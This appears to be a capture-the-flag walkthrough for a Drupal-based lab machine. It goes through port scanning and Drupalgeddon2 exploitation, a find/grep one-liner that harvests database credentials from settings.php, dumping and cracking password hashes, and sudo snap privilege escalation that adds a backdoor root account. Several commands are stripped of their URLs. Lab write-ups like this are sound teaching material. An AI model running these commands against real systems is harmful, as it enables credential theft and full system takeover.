nmap -p- -sS -sV

22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)

Port 80 hosts a web server which is visually identifiable as a Drupal instance.

Standard enumeration did not show any interest information. From here drupwn was utilized to identify the exact version of Drupal installed.



git clone
cd drupwn
python3 install


drupwn --mode enum --target  

Searchsploit **** shows that this version of Drupal is vulnerable to "Drupalgeddon".

searchsploit -w "drupal 7.56"

Metasploit has a module for drupalgeddon2. Once the corrects options were set the exploit was executed.

Where we receive a meterpreter shell.

Now with a shell, we find we are working as the apache user. As Drupal is installed we perform some basic enumeration steps to look for MySQL usernames and passwords. The command below can be used to scour the settings.php file for this information.

find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null

Finding the above credentials we run a single command against MySQL to find a hash for a user on the machine.

mysql -u drupaluser --password='CQHEy@9M*m23gBVj' -e 'use drupal; select * from users'

This hash is then cracked with john to reveal the credentials: brucetherealadmin:boobo.

sudo john --wordlist=/usr/share/wordlists/rockyou.txt ~/Desktop/hash.txt   

We can now login over SSH as the user brucetherealadmin.

From here was utilized to help with Privilege Escalation identification.

We find the current user can run the /usr/bin/snap binary as the root user without specifying a password.


From the above GTFOBins link we see that a malicious package can be crafted and used to execute the package in the context of the root user.

The blog post linked below shows some ways in which this can be done.


We can also use the below Snap_Generator to help us easily craft the required snap packages.


Install fpm (Required)

sudo gem install fpm

Download and prepare Snap_Generator

wget && chmod +x

After running the above command we need to then issue a command to the script to use in our package. In this instance we will add a new root user to the target system.

/usr/sbin/useradd -p $(openssl passwd -1 Password123) -u 0 -o -s /bin/bash -m owned

Upload the snap package to the target system.

sudo -u root /usr/bin/snap install /home/brucetherealadmin/owned_1.0_all.snap --dangerous --devmode

After completion check for existence of the new user.

Once confirmed, switch over to the new user.

Last updated